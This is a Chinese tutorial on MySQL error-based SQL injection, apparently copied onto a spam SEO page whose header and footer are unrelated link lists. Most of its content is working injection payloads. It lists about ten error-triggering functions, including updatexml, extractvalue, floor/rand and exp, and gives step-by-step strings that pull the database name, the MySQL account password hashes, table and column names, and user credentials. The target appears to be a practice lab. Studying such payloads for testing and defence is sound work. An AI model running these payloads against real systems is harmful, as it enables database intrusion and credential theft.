当前位置: 首页 > news >正文

电商网站建设渠道如何推广网上国网

电商网站建设渠道,如何推广网上国网,天津做网站的公,wordpress 打包 转移报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义 报错注入:利用sql语句的不规范,获取相关sql提示信息 代码展示 常用的报错语句 select first_name, last_name FROM…

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() -- 

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

http://www.wangmingla.cn/news/45419.html

相关文章:

  • 一个网站的构建域名解析ip
  • 网站应该如何进行优化一键注册所有网站
  • 建网站需要什么步骤百度认证中心
  • 做全屏式网站尺寸是多大岳阳网站建设推广
  • 大武口做网站的正规淘宝代运营去哪里找
  • 有服务器自己怎么做网站沈阳关键词推广
  • 公司网络安全管理制度和应急工作预案天津海外seo
  • 新西兰网站开发专业国家免费技能培训
  • 网站建设费用计入什么会计科目seo优化自学
  • 有没有教做网站实例视频手机百度app免费下载
  • 做网站需要的东西不知怎么入门
  • 积分交易网站开发百度百度一下首页
  • 网络运营需要什么学历seo的基本步骤
  • 苏州营销网站建设app优化推广
  • .net电商网站开发项目网站
  • 南宁市网站试分析网站推广和优化的原因
  • 设计官网收费标准seo网站排名
  • 做网站需注意事项怎么进行seo
  • 做营销型网站要多少钱秦皇岛seo排名
  • 在哪进入网站后台公司软文推广
  • 湛江专业建站推荐百度网站登录
  • 做众筹网站怎么赚钱广州营销网站建设靠谱
  • 河北固安县网站建设百度推广登录平台app
  • 电子网站建设公司合肥360seo排名
  • 餐饮网站建设推广长沙seo网站管理
  • java做的网站怎么发布需要优化的网站有哪些?
  • 贵州做网站网络服务提供商是指
  • 做外贸哪些网站好企业网站运营推广
  • 网站建设是学哪个学科百度快速seo优化
  • 网站开发 flexit培训班出来现状